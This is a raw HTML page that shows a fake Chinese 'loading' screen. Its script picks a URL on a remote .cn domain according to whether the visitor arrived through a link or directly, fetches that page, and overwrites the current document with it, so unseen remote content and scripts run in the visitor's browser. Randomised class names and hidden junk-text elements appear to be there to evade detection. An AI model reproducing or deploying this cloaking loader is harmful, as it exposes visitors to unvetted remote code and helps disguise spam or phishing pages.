<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .tpHVy7GkQA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .tpHVy7GkQA .o3uGkbD7HVi {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .tpHVy7GkQA .content {
            line-height: 50px;
            text-align: center
        }

        .tpHVy7GkQA .img {
            width: 100%
        }

        .tpHVy7GkQA .uKuwHE {
            text-align: center
        }

        .tpHVy7GkQA .uKuwHE span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .tpHVy7GkQA .uKuwHE span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .tpHVy7GkQA .uKuwHE span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .tpHVy7GkQA .uKuwHE span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .tpHVy7GkQA .uKuwHE span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .tpHVy7GkQA .uKuwHE span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .tpHVy7GkQA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function X5AJGGclEuhOw(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var kPF7Me = X5AJGGclEuhOw('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ kPF7Me +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ kPF7Me +".html?a=share";
		}
		
        vsq4DRt=url+"#"+new Date().getTime();
        vsq4DRt && function() {
            $.get(vsq4DRt, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >aDhWZNNR6xoyskgIZjcxvtNYV</li>
<div style='display:none'>FesH3EmT1RnCcPZtCaKpMyEMFjuwD0pI8oPyZVG39FKcIhI72XIX39F</div>
<span style='display:none'>HUSPFHO8MLDcseTSG1juiXeJ4ZI32iZAy2gY78GNG08DdC5pCo7Dr2cJEYTbR8llh4nRBfpAfetGmCtBbA8GVjG0ke3cRdmPqKTu</span>
<p  style='display:none'>ufBmJtOo4bcn05ntdK6RyzhvseO0UaMiesxwmqfxo9VOcPFVxqwglEeu57j6AkMjFacBifEX</p>
<a  href='#' style='display:none'>gwm6c6ZzDYNfOGLtis1QdLekK60uZSbqoNurSe3nPWHGL76Qi0LaI2LyA8ffgb01Olag6</a>
<b style='display:none' >zYG2jf1jzbF8TpzUIKfL0HsSc1hi0kvs3jKZmo37dtAzdnHr5aWN9yqLb8ONvwffMNpWwxX9dGrXM</b>
<div style='display:none'>FesH3EmT1RnCcPZtCaKpMyEMFjuwD0pI8oPyZVG39FKcIhI72XIX39F</div><div class="tpHVy7GkQA">
    <div class="o3uGkbD7HVi">
        <div class="uKuwHE">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>rthlYSVTl2uvr6ww6998Xj97OZ0DaaJpdoNc3xU4pciLAikCwqkXfgezDojQ5KlBXMYmlCqHdo</a>
<div style='display:none'>sFc2NYsYquJrJzOF76U2qc3W3hL47gE9uLLpiBvuErSh2M8KKGsnfE3XkT2gbBzEe62yHngIzcRWmQVRDL6mxRu5OzEZ2jCd88Um</div>
<img  src='' style='display:none'>
<ul style='display:none' >InXzpnYdaAuGkLW21iFJoBIos</ul>
<b style='display:none' >kbS6aVmi7Tlus8SEENuKjqb8bIfOa4xhS</b>
<b style='display:none' >kbS6aVmi7Tlus8SEENuKjqb8bIfOa4xhS</b>
<span style='display:none'>Ds0ekmzvsK4NYwSC7xmrET7SwXmq1hfjjPWrXAvF8lbWorM2gUc2JTiVK4A9iPWs</span></body>
</html>